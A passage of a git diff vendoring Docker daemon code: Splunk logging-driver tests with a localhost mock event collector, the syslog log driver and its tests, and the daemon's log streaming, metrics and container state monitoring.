	hec.simulateServerError = true
	go hec.Serve()

	ctx := logger.Context{
		Config: map[string]string{
			splunkURLKey:              hec.URL(),
			splunkTokenKey:            hec.token,
			splunkVerifyConnectionKey: "false",
		},
		ContainerID:        "containeriid",
		ContainerName:      "/container_name",
		ContainerImageID:   "contaimageid",
		ContainerImageName: "container_image_name",
	}

	loggerDriver, err := New(ctx)
	if err != nil {
		t.Fatal(err)
	}

	if hec.connectionVerified {
		t.Fatal("Connection should not be verified")
	}

	// Push one more message than the buffer can hold while the server is erroring.
	for i := 0; i < 11; i++ {
		if err := loggerDriver.Log(&logger.Message{[]byte(fmt.Sprintf("%d", i)), "stdout", time.Now(), nil, false}); err != nil {
			t.Fatal(err)
		}
	}

	if len(hec.messages) != 0 {
		t.Fatal("No messages should be accepted at this point")
	}

	hec.simulateServerError = false

	err = loggerDriver.Close()
	if err != nil {
		t.Fatal(err)
	}

	if len(hec.messages) != 9 {
		t.Fatalf("Expected # of messages %d, got %d", 9, len(hec.messages))
	}

	// The buffer maximum is 10: the two oldest messages were dropped (logged to the
	// daemon log instead) when the buffer overflowed, so the delivered events start
	// at "2" — hence the i+2 offset below.
	for i, message := range hec.messages {
		if event, err := message.EventAsMap(); err != nil {
			t.Fatal(err)
		} else {
			if event["line"] != fmt.Sprintf("%d", i+2) {
				t.Fatalf("Unexpected event in message %v", event)
			}
		}
	}

	err = hec.Close()
	if err != nil {
		t.Fatal(err)
	}

	if err := os.Setenv(envVarPostMessagesBatchSize, ""); err != nil {
		t.Fatal(err)
	}

	if err := os.Setenv(envVarBufferMaximum, ""); err != nil {
		t.Fatal(err)
	}

	if err := os.Setenv(envVarStreamChannelSize, ""); err != nil {
		t.Fatal(err)
	}
}

// Verify that we are
not blocking close when HEC is down for the whole time +func TestServerAlwaysDown(t *testing.T) { + if err := os.Setenv(envVarPostMessagesBatchSize, "2"); err != nil { + t.Fatal(err) + } + + if err := os.Setenv(envVarBufferMaximum, "4"); err != nil { + t.Fatal(err) + } + + if err := os.Setenv(envVarStreamChannelSize, "0"); err != nil { + t.Fatal(err) + } + + hec := NewHTTPEventCollectorMock(t) + hec.simulateServerError = true + go hec.Serve() + + ctx := logger.Context{ + Config: map[string]string{ + splunkURLKey: hec.URL(), + splunkTokenKey: hec.token, + splunkVerifyConnectionKey: "false", + }, + ContainerID: "containeriid", + ContainerName: "/container_name", + ContainerImageID: "contaimageid", + ContainerImageName: "container_image_name", + } + + loggerDriver, err := New(ctx) + if err != nil { + t.Fatal(err) + } + + if hec.connectionVerified { + t.Fatal("Connection should not be verified") + } + + for i := 0; i < 5; i++ { + if err := loggerDriver.Log(&logger.Message{[]byte(fmt.Sprintf("%d", i)), "stdout", time.Now(), nil, false}); err != nil { + t.Fatal(err) + } + } + + err = loggerDriver.Close() + if err != nil { + t.Fatal(err) + } + + if len(hec.messages) != 0 { + t.Fatal("No messages should be sent") + } + + err = hec.Close() + if err != nil { + t.Fatal(err) + } + + if err := os.Setenv(envVarPostMessagesBatchSize, ""); err != nil { + t.Fatal(err) + } + + if err := os.Setenv(envVarBufferMaximum, ""); err != nil { + t.Fatal(err) + } + + if err := os.Setenv(envVarStreamChannelSize, ""); err != nil { + t.Fatal(err) + } +} + +// Cannot send messages after we close driver +func TestCannotSendAfterClose(t *testing.T) { + hec := NewHTTPEventCollectorMock(t) + go hec.Serve() + + ctx := logger.Context{ + Config: map[string]string{ + splunkURLKey: hec.URL(), + splunkTokenKey: hec.token, + }, + ContainerID: "containeriid", + ContainerName: "/container_name", + ContainerImageID: "contaimageid", + ContainerImageName: "container_image_name", + } + + loggerDriver, err := 
New(ctx) + if err != nil { + t.Fatal(err) + } + + if err := loggerDriver.Log(&logger.Message{[]byte("message1"), "stdout", time.Now(), nil, false}); err != nil { + t.Fatal(err) + } + + err = loggerDriver.Close() + if err != nil { + t.Fatal(err) + } + + if err := loggerDriver.Log(&logger.Message{[]byte("message2"), "stdout", time.Now(), nil, false}); err == nil { + t.Fatal("Driver should not allow to send messages after close") + } + + if len(hec.messages) != 1 { + t.Fatal("Only one message should be sent") + } + + message := hec.messages[0] + if event, err := message.EventAsMap(); err != nil { + t.Fatal(err) + } else { + if event["line"] != "message1" { + t.Fatalf("Unexpected event in message %v", event) + } + } + + err = hec.Close() + if err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/daemon/logger/splunk/splunkhecmock_test.go b/vendor/github.com/docker/docker/daemon/logger/splunk/splunkhecmock_test.go new file mode 100644 index 0000000000..e508948280 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/splunk/splunkhecmock_test.go @@ -0,0 +1,157 @@ +package splunk + +import ( + "compress/gzip" + "encoding/json" + "fmt" + "io" + "io/ioutil" + "net" + "net/http" + "testing" +) + +func (message *splunkMessage) EventAsString() (string, error) { + if val, ok := message.Event.(string); ok { + return val, nil + } + return "", fmt.Errorf("Cannot cast Event %v to string", message.Event) +} + +func (message *splunkMessage) EventAsMap() (map[string]interface{}, error) { + if val, ok := message.Event.(map[string]interface{}); ok { + return val, nil + } + return nil, fmt.Errorf("Cannot cast Event %v to map", message.Event) +} + +type HTTPEventCollectorMock struct { + tcpAddr *net.TCPAddr + tcpListener *net.TCPListener + + token string + simulateServerError bool + + test *testing.T + + connectionVerified bool + gzipEnabled *bool + messages []*splunkMessage + numOfRequests int +} + +func NewHTTPEventCollectorMock(t *testing.T) 
*HTTPEventCollectorMock { + tcpAddr := &net.TCPAddr{IP: []byte{127, 0, 0, 1}, Port: 0, Zone: ""} + tcpListener, err := net.ListenTCP("tcp", tcpAddr) + if err != nil { + t.Fatal(err) + } + return &HTTPEventCollectorMock{ + tcpAddr: tcpAddr, + tcpListener: tcpListener, + token: "4642492F-D8BD-47F1-A005-0C08AE4657DF", + simulateServerError: false, + test: t, + connectionVerified: false} +} + +func (hec *HTTPEventCollectorMock) URL() string { + return "http://" + hec.tcpListener.Addr().String() +} + +func (hec *HTTPEventCollectorMock) Serve() error { + return http.Serve(hec.tcpListener, hec) +} + +func (hec *HTTPEventCollectorMock) Close() error { + return hec.tcpListener.Close() +} + +func (hec *HTTPEventCollectorMock) ServeHTTP(writer http.ResponseWriter, request *http.Request) { + var err error + + hec.numOfRequests++ + + if hec.simulateServerError { + if request.Body != nil { + defer request.Body.Close() + } + writer.WriteHeader(http.StatusInternalServerError) + return + } + + switch request.Method { + case http.MethodOptions: + // Verify that options method is getting called only once + if hec.connectionVerified { + hec.test.Errorf("Connection should not be verified more than once. 
Got second request with %s method.", request.Method)
		}
		hec.connectionVerified = true
		writer.WriteHeader(http.StatusOK)
	case http.MethodPost:
		// Always verify that Driver is using correct path to HEC
		if request.URL.String() != "/services/collector/event/1.0" {
			hec.test.Errorf("Unexpected path %v", request.URL)
		}
		defer request.Body.Close()

		if authorization, ok := request.Header["Authorization"]; !ok || authorization[0] != ("Splunk "+hec.token) {
			hec.test.Error("Authorization header is invalid.")
		}

		gzipEnabled := false
		if contentEncoding, ok := request.Header["Content-Encoding"]; ok && contentEncoding[0] == "gzip" {
			gzipEnabled = true
		}

		if hec.gzipEnabled == nil {
			hec.gzipEnabled = &gzipEnabled
		} else if gzipEnabled != *hec.gzipEnabled {
			// Nothing wrong with that, but we just know that Splunk Logging Driver does not do that
			hec.test.Error("Driver should not change Content Encoding.")
		}

		var gzipReader *gzip.Reader
		var reader io.Reader
		if gzipEnabled {
			gzipReader, err = gzip.NewReader(request.Body)
			if err != nil {
				hec.test.Fatal(err)
			}
			reader = gzipReader
		} else {
			reader = request.Body
		}

		// Read body
		var body []byte
		body, err = ioutil.ReadAll(reader)
		if err != nil {
			hec.test.Fatal(err)
		}

		// Parse message: the driver concatenates JSON objects back to back, so
		// split the body on each '}{' boundary and unmarshal one object at a time.
		messageStart := 0
		for i := 0; i < len(body); i++ {
			if i == len(body)-1 || (body[i] == '}' && body[i+1] == '{') {
				var message splunkMessage
				err = json.Unmarshal(body[messageStart:i+1], &message)
				if err != nil {
					hec.test.Log(string(body[messageStart : i+1]))
					hec.test.Fatal(err)
				}
				hec.messages = append(hec.messages, &message)
				messageStart = i + 1
			}
		}

		if gzipEnabled {
			gzipReader.Close()
		}

		writer.WriteHeader(http.StatusOK)
	default:
		// Bug fix: report the method actually received, not the http.MethodOptions
		// constant, so the failure message names the offending method.
		hec.test.Errorf("Unexpected HTTP method %s", request.Method)
		writer.WriteHeader(http.StatusBadRequest)
	}
}

diff --git a/vendor/github.com/docker/docker/daemon/logger/syslog/syslog.go 
b/vendor/github.com/docker/docker/daemon/logger/syslog/syslog.go new file mode 100644 index 0000000000..fb9e867ff5 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/syslog/syslog.go @@ -0,0 +1,262 @@ +// Package syslog provides the logdriver for forwarding server logs to syslog endpoints. +package syslog + +import ( + "crypto/tls" + "errors" + "fmt" + "net" + "net/url" + "os" + "strconv" + "strings" + "time" + + syslog "github.com/RackSec/srslog" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/daemon/logger" + "github.com/docker/docker/daemon/logger/loggerutils" + "github.com/docker/docker/pkg/urlutil" + "github.com/docker/go-connections/tlsconfig" +) + +const ( + name = "syslog" + secureProto = "tcp+tls" +) + +var facilities = map[string]syslog.Priority{ + "kern": syslog.LOG_KERN, + "user": syslog.LOG_USER, + "mail": syslog.LOG_MAIL, + "daemon": syslog.LOG_DAEMON, + "auth": syslog.LOG_AUTH, + "syslog": syslog.LOG_SYSLOG, + "lpr": syslog.LOG_LPR, + "news": syslog.LOG_NEWS, + "uucp": syslog.LOG_UUCP, + "cron": syslog.LOG_CRON, + "authpriv": syslog.LOG_AUTHPRIV, + "ftp": syslog.LOG_FTP, + "local0": syslog.LOG_LOCAL0, + "local1": syslog.LOG_LOCAL1, + "local2": syslog.LOG_LOCAL2, + "local3": syslog.LOG_LOCAL3, + "local4": syslog.LOG_LOCAL4, + "local5": syslog.LOG_LOCAL5, + "local6": syslog.LOG_LOCAL6, + "local7": syslog.LOG_LOCAL7, +} + +type syslogger struct { + writer *syslog.Writer +} + +func init() { + if err := logger.RegisterLogDriver(name, New); err != nil { + logrus.Fatal(err) + } + if err := logger.RegisterLogOptValidator(name, ValidateLogOpt); err != nil { + logrus.Fatal(err) + } +} + +// rsyslog uses appname part of syslog message to fill in an %syslogtag% template +// attribute in rsyslog.conf. 
In order to be backward compatible to rfc3164 +// tag will be also used as an appname +func rfc5424formatterWithAppNameAsTag(p syslog.Priority, hostname, tag, content string) string { + timestamp := time.Now().Format(time.RFC3339) + pid := os.Getpid() + msg := fmt.Sprintf("<%d>%d %s %s %s %d %s %s", + p, 1, timestamp, hostname, tag, pid, tag, content) + return msg +} + +// The timestamp field in rfc5424 is derived from rfc3339. Whereas rfc3339 makes allowances +// for multiple syntaxes, there are further restrictions in rfc5424, i.e., the maximium +// resolution is limited to "TIME-SECFRAC" which is 6 (microsecond resolution) +func rfc5424microformatterWithAppNameAsTag(p syslog.Priority, hostname, tag, content string) string { + timestamp := time.Now().Format("2006-01-02T15:04:05.999999Z07:00") + pid := os.Getpid() + msg := fmt.Sprintf("<%d>%d %s %s %s %d %s %s", + p, 1, timestamp, hostname, tag, pid, tag, content) + return msg +} + +// New creates a syslog logger using the configuration passed in on +// the context. Supported context configuration variables are +// syslog-address, syslog-facility, syslog-format. 
+func New(ctx logger.Context) (logger.Logger, error) { + tag, err := loggerutils.ParseLogTag(ctx, loggerutils.DefaultTemplate) + if err != nil { + return nil, err + } + + proto, address, err := parseAddress(ctx.Config["syslog-address"]) + if err != nil { + return nil, err + } + + facility, err := parseFacility(ctx.Config["syslog-facility"]) + if err != nil { + return nil, err + } + + syslogFormatter, syslogFramer, err := parseLogFormat(ctx.Config["syslog-format"], proto) + if err != nil { + return nil, err + } + + var log *syslog.Writer + if proto == secureProto { + tlsConfig, tlsErr := parseTLSConfig(ctx.Config) + if tlsErr != nil { + return nil, tlsErr + } + log, err = syslog.DialWithTLSConfig(proto, address, facility, tag, tlsConfig) + } else { + log, err = syslog.Dial(proto, address, facility, tag) + } + + if err != nil { + return nil, err + } + + log.SetFormatter(syslogFormatter) + log.SetFramer(syslogFramer) + + return &syslogger{ + writer: log, + }, nil +} + +func (s *syslogger) Log(msg *logger.Message) error { + if msg.Source == "stderr" { + return s.writer.Err(string(msg.Line)) + } + return s.writer.Info(string(msg.Line)) +} + +func (s *syslogger) Close() error { + return s.writer.Close() +} + +func (s *syslogger) Name() string { + return name +} + +func parseAddress(address string) (string, string, error) { + if address == "" { + return "", "", nil + } + if !urlutil.IsTransportURL(address) { + return "", "", fmt.Errorf("syslog-address should be in form proto://address, got %v", address) + } + url, err := url.Parse(address) + if err != nil { + return "", "", err + } + + // unix and unixgram socket validation + if url.Scheme == "unix" || url.Scheme == "unixgram" { + if _, err := os.Stat(url.Path); err != nil { + return "", "", err + } + return url.Scheme, url.Path, nil + } + + // here we process tcp|udp + host := url.Host + if _, _, err := net.SplitHostPort(host); err != nil { + if !strings.Contains(err.Error(), "missing port in address") { + return "", "", 
err + } + host = host + ":514" + } + + return url.Scheme, host, nil +} + +// ValidateLogOpt looks for syslog specific log options +// syslog-address, syslog-facility. +func ValidateLogOpt(cfg map[string]string) error { + for key := range cfg { + switch key { + case "env": + case "labels": + case "syslog-address": + case "syslog-facility": + case "syslog-tls-ca-cert": + case "syslog-tls-cert": + case "syslog-tls-key": + case "syslog-tls-skip-verify": + case "tag": + case "syslog-format": + default: + return fmt.Errorf("unknown log opt '%s' for syslog log driver", key) + } + } + if _, _, err := parseAddress(cfg["syslog-address"]); err != nil { + return err + } + if _, err := parseFacility(cfg["syslog-facility"]); err != nil { + return err + } + if _, _, err := parseLogFormat(cfg["syslog-format"], ""); err != nil { + return err + } + return nil +} + +func parseFacility(facility string) (syslog.Priority, error) { + if facility == "" { + return syslog.LOG_DAEMON, nil + } + + if syslogFacility, valid := facilities[facility]; valid { + return syslogFacility, nil + } + + fInt, err := strconv.Atoi(facility) + if err == nil && 0 <= fInt && fInt <= 23 { + return syslog.Priority(fInt << 3), nil + } + + return syslog.Priority(0), errors.New("invalid syslog facility") +} + +func parseTLSConfig(cfg map[string]string) (*tls.Config, error) { + _, skipVerify := cfg["syslog-tls-skip-verify"] + + opts := tlsconfig.Options{ + CAFile: cfg["syslog-tls-ca-cert"], + CertFile: cfg["syslog-tls-cert"], + KeyFile: cfg["syslog-tls-key"], + InsecureSkipVerify: skipVerify, + } + + return tlsconfig.Client(opts) +} + +func parseLogFormat(logFormat, proto string) (syslog.Formatter, syslog.Framer, error) { + switch logFormat { + case "": + return syslog.UnixFormatter, syslog.DefaultFramer, nil + case "rfc3164": + return syslog.RFC3164Formatter, syslog.DefaultFramer, nil + case "rfc5424": + if proto == secureProto { + return rfc5424formatterWithAppNameAsTag, syslog.RFC5425MessageLengthFramer, nil + } 
+ return rfc5424formatterWithAppNameAsTag, syslog.DefaultFramer, nil + case "rfc5424micro": + if proto == secureProto { + return rfc5424microformatterWithAppNameAsTag, syslog.RFC5425MessageLengthFramer, nil + } + return rfc5424microformatterWithAppNameAsTag, syslog.DefaultFramer, nil + default: + return nil, nil, errors.New("Invalid syslog format") + } + +} diff --git a/vendor/github.com/docker/docker/daemon/logger/syslog/syslog_test.go b/vendor/github.com/docker/docker/daemon/logger/syslog/syslog_test.go new file mode 100644 index 0000000000..501561064b --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/syslog/syslog_test.go @@ -0,0 +1,62 @@ +package syslog + +import ( + "reflect" + "testing" + + syslog "github.com/RackSec/srslog" +) + +func functionMatches(expectedFun interface{}, actualFun interface{}) bool { + return reflect.ValueOf(expectedFun).Pointer() == reflect.ValueOf(actualFun).Pointer() +} + +func TestParseLogFormat(t *testing.T) { + formatter, framer, err := parseLogFormat("rfc5424", "udp") + if err != nil || !functionMatches(rfc5424formatterWithAppNameAsTag, formatter) || + !functionMatches(syslog.DefaultFramer, framer) { + t.Fatal("Failed to parse rfc5424 format", err, formatter, framer) + } + + formatter, framer, err = parseLogFormat("rfc5424", "tcp+tls") + if err != nil || !functionMatches(rfc5424formatterWithAppNameAsTag, formatter) || + !functionMatches(syslog.RFC5425MessageLengthFramer, framer) { + t.Fatal("Failed to parse rfc5424 format", err, formatter, framer) + } + + formatter, framer, err = parseLogFormat("rfc5424micro", "udp") + if err != nil || !functionMatches(rfc5424microformatterWithAppNameAsTag, formatter) || + !functionMatches(syslog.DefaultFramer, framer) { + t.Fatal("Failed to parse rfc5424 (microsecond) format", err, formatter, framer) + } + + formatter, framer, err = parseLogFormat("rfc5424micro", "tcp+tls") + if err != nil || !functionMatches(rfc5424microformatterWithAppNameAsTag, formatter) || + 
!functionMatches(syslog.RFC5425MessageLengthFramer, framer) { + t.Fatal("Failed to parse rfc5424 (microsecond) format", err, formatter, framer) + } + + formatter, framer, err = parseLogFormat("rfc3164", "") + if err != nil || !functionMatches(syslog.RFC3164Formatter, formatter) || + !functionMatches(syslog.DefaultFramer, framer) { + t.Fatal("Failed to parse rfc3164 format", err, formatter, framer) + } + + formatter, framer, err = parseLogFormat("", "") + if err != nil || !functionMatches(syslog.UnixFormatter, formatter) || + !functionMatches(syslog.DefaultFramer, framer) { + t.Fatal("Failed to parse empty format", err, formatter, framer) + } + + formatter, framer, err = parseLogFormat("invalid", "") + if err == nil { + t.Fatal("Failed to parse invalid format", err, formatter, framer) + } +} + +func TestValidateLogOptEmpty(t *testing.T) { + emptyConfig := make(map[string]string) + if err := ValidateLogOpt(emptyConfig); err != nil { + t.Fatal("Failed to parse empty config", err) + } +} diff --git a/vendor/github.com/docker/docker/daemon/logs.go b/vendor/github.com/docker/docker/daemon/logs.go new file mode 100644 index 0000000000..cc34b82083 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logs.go @@ -0,0 +1,142 @@ +package daemon + +import ( + "fmt" + "io" + "strconv" + "time" + + "golang.org/x/net/context" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/types/backend" + containertypes "github.com/docker/docker/api/types/container" + timetypes "github.com/docker/docker/api/types/time" + "github.com/docker/docker/container" + "github.com/docker/docker/daemon/logger" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/stdcopy" +) + +// ContainerLogs hooks up a container's stdout and stderr streams +// configured with the given struct. 
+func (daemon *Daemon) ContainerLogs(ctx context.Context, containerName string, config *backend.ContainerLogsConfig, started chan struct{}) error { + container, err := daemon.GetContainer(containerName) + if err != nil { + return err + } + + if !(config.ShowStdout || config.ShowStderr) { + return fmt.Errorf("You must choose at least one stream") + } + + cLog, err := daemon.getLogger(container) + if err != nil { + return err + } + logReader, ok := cLog.(logger.LogReader) + if !ok { + return logger.ErrReadLogsNotSupported + } + + follow := config.Follow && container.IsRunning() + tailLines, err := strconv.Atoi(config.Tail) + if err != nil { + tailLines = -1 + } + + logrus.Debug("logs: begin stream") + + var since time.Time + if config.Since != "" { + s, n, err := timetypes.ParseTimestamps(config.Since, 0) + if err != nil { + return err + } + since = time.Unix(s, n) + } + readConfig := logger.ReadConfig{ + Since: since, + Tail: tailLines, + Follow: follow, + } + logs := logReader.ReadLogs(readConfig) + + wf := ioutils.NewWriteFlusher(config.OutStream) + defer wf.Close() + close(started) + wf.Flush() + + var outStream io.Writer + outStream = wf + errStream := outStream + if !container.Config.Tty { + errStream = stdcopy.NewStdWriter(outStream, stdcopy.Stderr) + outStream = stdcopy.NewStdWriter(outStream, stdcopy.Stdout) + } + + for { + select { + case err := <-logs.Err: + logrus.Errorf("Error streaming logs: %v", err) + return nil + case <-ctx.Done(): + logs.Close() + return nil + case msg, ok := <-logs.Msg: + if !ok { + logrus.Debug("logs: end stream") + logs.Close() + if cLog != container.LogDriver { + // Since the logger isn't cached in the container, which occurs if it is running, it + // must get explicitly closed here to avoid leaking it and any file handles it has. 
+ if err := cLog.Close(); err != nil { + logrus.Errorf("Error closing logger: %v", err) + } + } + return nil + } + logLine := msg.Line + if config.Details { + logLine = append([]byte(msg.Attrs.String()+" "), logLine...) + } + if config.Timestamps { + logLine = append([]byte(msg.Timestamp.Format(logger.TimeFormat)+" "), logLine...) + } + if msg.Source == "stdout" && config.ShowStdout { + outStream.Write(logLine) + } + if msg.Source == "stderr" && config.ShowStderr { + errStream.Write(logLine) + } + } + } +} + +func (daemon *Daemon) getLogger(container *container.Container) (logger.Logger, error) { + if container.LogDriver != nil && container.IsRunning() { + return container.LogDriver, nil + } + return container.StartLogger(container.HostConfig.LogConfig) +} + +// mergeLogConfig merges the daemon log config to the container's log config if the container's log driver is not specified. +func (daemon *Daemon) mergeAndVerifyLogConfig(cfg *containertypes.LogConfig) error { + if cfg.Type == "" { + cfg.Type = daemon.defaultLogConfig.Type + } + + if cfg.Config == nil { + cfg.Config = make(map[string]string) + } + + if cfg.Type == daemon.defaultLogConfig.Type { + for k, v := range daemon.defaultLogConfig.Config { + if _, ok := cfg.Config[k]; !ok { + cfg.Config[k] = v + } + } + } + + return logger.ValidateLogOpts(cfg.Type, cfg.Config) +} diff --git a/vendor/github.com/docker/docker/daemon/logs_test.go b/vendor/github.com/docker/docker/daemon/logs_test.go new file mode 100644 index 0000000000..0c36299e09 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logs_test.go @@ -0,0 +1,15 @@ +package daemon + +import ( + "testing" + + containertypes "github.com/docker/docker/api/types/container" +) + +func TestMergeAndVerifyLogConfigNilConfig(t *testing.T) { + d := &Daemon{defaultLogConfig: containertypes.LogConfig{Type: "json-file", Config: map[string]string{"max-file": "1"}}} + cfg := containertypes.LogConfig{Type: d.defaultLogConfig.Type} + if err := 
d.mergeAndVerifyLogConfig(&cfg); err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/daemon/metrics.go b/vendor/github.com/docker/docker/daemon/metrics.go new file mode 100644 index 0000000000..69dbfd9378 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/metrics.go @@ -0,0 +1,42 @@ +package daemon + +import "github.com/docker/go-metrics" + +var ( + containerActions metrics.LabeledTimer + imageActions metrics.LabeledTimer + networkActions metrics.LabeledTimer + engineVersion metrics.LabeledGauge + engineCpus metrics.Gauge + engineMemory metrics.Gauge + healthChecksCounter metrics.Counter + healthChecksFailedCounter metrics.Counter +) + +func init() { + ns := metrics.NewNamespace("engine", "daemon", nil) + containerActions = ns.NewLabeledTimer("container_actions", "The number of seconds it takes to process each container action", "action") + for _, a := range []string{ + "start", + "changes", + "commit", + "create", + "delete", + } { + containerActions.WithValues(a).Update(0) + } + networkActions = ns.NewLabeledTimer("network_actions", "The number of seconds it takes to process each network action", "action") + engineVersion = ns.NewLabeledGauge("engine", "The version and commit information for the engine process", metrics.Unit("info"), + "version", + "commit", + "architecture", + "graph_driver", "kernel", + "os", + ) + engineCpus = ns.NewGauge("engine_cpus", "The number of cpus that the host system of the engine has", metrics.Unit("cpus")) + engineMemory = ns.NewGauge("engine_memory", "The number of bytes of memory that the host system of the engine has", metrics.Bytes) + healthChecksCounter = ns.NewCounter("health_checks", "The total number of health checks") + healthChecksFailedCounter = ns.NewCounter("health_checks_failed", "The total number of failed health checks") + imageActions = ns.NewLabeledTimer("image_actions", "The number of seconds it takes to process each image action", "action") + metrics.Register(ns) +} diff --git 
a/vendor/github.com/docker/docker/daemon/monitor.go b/vendor/github.com/docker/docker/daemon/monitor.go new file mode 100644 index 0000000000..ee0d1fcce0 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/monitor.go @@ -0,0 +1,132 @@ +package daemon + +import ( + "errors" + "fmt" + "runtime" + "strconv" + "time" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/types" + "github.com/docker/docker/libcontainerd" + "github.com/docker/docker/restartmanager" +) + +// StateChanged updates daemon state changes from containerd +func (daemon *Daemon) StateChanged(id string, e libcontainerd.StateInfo) error { + c := daemon.containers.Get(id) + if c == nil { + return fmt.Errorf("no such container: %s", id) + } + + switch e.State { + case libcontainerd.StateOOM: + // StateOOM is Linux specific and should never be hit on Windows + if runtime.GOOS == "windows" { + return errors.New("Received StateOOM from libcontainerd on Windows. This should never happen.") + } + daemon.updateHealthMonitor(c) + daemon.LogContainerEvent(c, "oom") + case libcontainerd.StateExit: + // if container's AutoRemove flag is set, remove it after clean up + autoRemove := func() { + if c.HostConfig.AutoRemove { + if err := daemon.ContainerRm(c.ID, &types.ContainerRmConfig{ForceRemove: true, RemoveVolume: true}); err != nil { + logrus.Errorf("can't remove container %s: %v", c.ID, err) + } + } + } + + c.Lock() + c.StreamConfig.Wait() + c.Reset(false) + + restart, wait, err := c.RestartManager().ShouldRestart(e.ExitCode, false, time.Since(c.StartedAt)) + if err == nil && restart { + c.RestartCount++ + c.SetRestarting(platformConstructExitStatus(e)) + } else { + c.SetStopped(platformConstructExitStatus(e)) + defer autoRemove() + } + + daemon.updateHealthMonitor(c) + attributes := map[string]string{ + "exitCode": strconv.Itoa(int(e.ExitCode)), + } + daemon.LogContainerEventWithAttributes(c, "die", attributes) + daemon.Cleanup(c) + + if err == nil && restart { + go func() { + err := <-wait 
+ if err == nil { + if err = daemon.containerStart(c, "", "", false); err != nil { + logrus.Debugf("failed to restart container: %+v", err) + } + } + if err != nil { + c.SetStopped(platformConstructExitStatus(e)) + defer autoRemove() + if err != restartmanager.ErrRestartCanceled { + logrus.Errorf("restartmanger wait error: %+v", err) + } + } + }() + } + + defer c.Unlock() + if err := c.ToDisk(); err != nil { + return err + } + return daemon.postRunProcessing(c, e) + case libcontainerd.StateExitProcess: + if execConfig := c.ExecCommands.Get(e.ProcessID); execConfig != nil { + ec := int(e.ExitCode) + execConfig.Lock() + defer execConfig.Unlock() + execConfig.ExitCode = &ec + execConfig.Running = false + execConfig.StreamConfig.Wait() + if err := execConfig.CloseStreams(); err != nil { + logrus.Errorf("%s: %s", c.ID, err) + } + + // remove the exec command from the container's store only and not the + // daemon's store so that the exec command can be inspected. + c.ExecCommands.Delete(execConfig.ID) + } else { + logrus.Warnf("Ignoring StateExitProcess for %v but no exec command found", e) + } + case libcontainerd.StateStart, libcontainerd.StateRestore: + // Container is already locked in this case + c.SetRunning(int(e.Pid), e.State == libcontainerd.StateStart) + c.HasBeenManuallyStopped = false + c.HasBeenStartedBefore = true + if err := c.ToDisk(); err != nil { + c.Reset(false) + return err + } + daemon.initHealthMonitor(c) + daemon.LogContainerEvent(c, "start") + case libcontainerd.StatePause: + // Container is already locked in this case + c.Paused = true + if err := c.ToDisk(); err != nil { + return err + } + daemon.updateHealthMonitor(c) + daemon.LogContainerEvent(c, "pause") + case libcontainerd.StateResume: + // Container is already locked in this case + c.Paused = false + if err := c.ToDisk(); err != nil { + return err + } + daemon.updateHealthMonitor(c) + daemon.LogContainerEvent(c, "unpause") + } + + return nil +} diff --git 
a/vendor/github.com/docker/docker/daemon/monitor_linux.go b/vendor/github.com/docker/docker/daemon/monitor_linux.go new file mode 100644 index 0000000000..09f5af50c6 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/monitor_linux.go @@ -0,0 +1,19 @@ +package daemon + +import ( + "github.com/docker/docker/container" + "github.com/docker/docker/libcontainerd" +) + +// platformConstructExitStatus returns a platform specific exit status structure +func platformConstructExitStatus(e libcontainerd.StateInfo) *container.ExitStatus { + return &container.ExitStatus{ + ExitCode: int(e.ExitCode), + OOMKilled: e.OOMKilled, + } +} + +// postRunProcessing perfoms any processing needed on the container after it has stopped. +func (daemon *Daemon) postRunProcessing(container *container.Container, e libcontainerd.StateInfo) error { + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/monitor_solaris.go b/vendor/github.com/docker/docker/daemon/monitor_solaris.go new file mode 100644 index 0000000000..5ccfada76a --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/monitor_solaris.go @@ -0,0 +1,18 @@ +package daemon + +import ( + "github.com/docker/docker/container" + "github.com/docker/docker/libcontainerd" +) + +// platformConstructExitStatus returns a platform specific exit status structure +func platformConstructExitStatus(e libcontainerd.StateInfo) *container.ExitStatus { + return &container.ExitStatus{ + ExitCode: int(e.ExitCode), + } +} + +// postRunProcessing perfoms any processing needed on the container after it has stopped. 
+func (daemon *Daemon) postRunProcessing(container *container.Container, e libcontainerd.StateInfo) error { + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/monitor_windows.go b/vendor/github.com/docker/docker/daemon/monitor_windows.go new file mode 100644 index 0000000000..9648b1b415 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/monitor_windows.go @@ -0,0 +1,46 @@ +package daemon + +import ( + "fmt" + + "github.com/docker/docker/container" + "github.com/docker/docker/libcontainerd" +) + +// platformConstructExitStatus returns a platform specific exit status structure +func platformConstructExitStatus(e libcontainerd.StateInfo) *container.ExitStatus { + return &container.ExitStatus{ + ExitCode: int(e.ExitCode), + } +} + +// postRunProcessing perfoms any processing needed on the container after it has stopped. +func (daemon *Daemon) postRunProcessing(container *container.Container, e libcontainerd.StateInfo) error { + if e.ExitCode == 0 && e.UpdatePending { + spec, err := daemon.createSpec(container) + if err != nil { + return err + } + + newOpts := []libcontainerd.CreateOption{&libcontainerd.ServicingOption{ + IsServicing: true, + }} + + copts, err := daemon.getLibcontainerdCreateOptions(container) + if err != nil { + return err + } + + if copts != nil { + newOpts = append(newOpts, copts...) + } + + // Create a new servicing container, which will start, complete the update, and merge back the + // results if it succeeded, all as part of the below function call. 
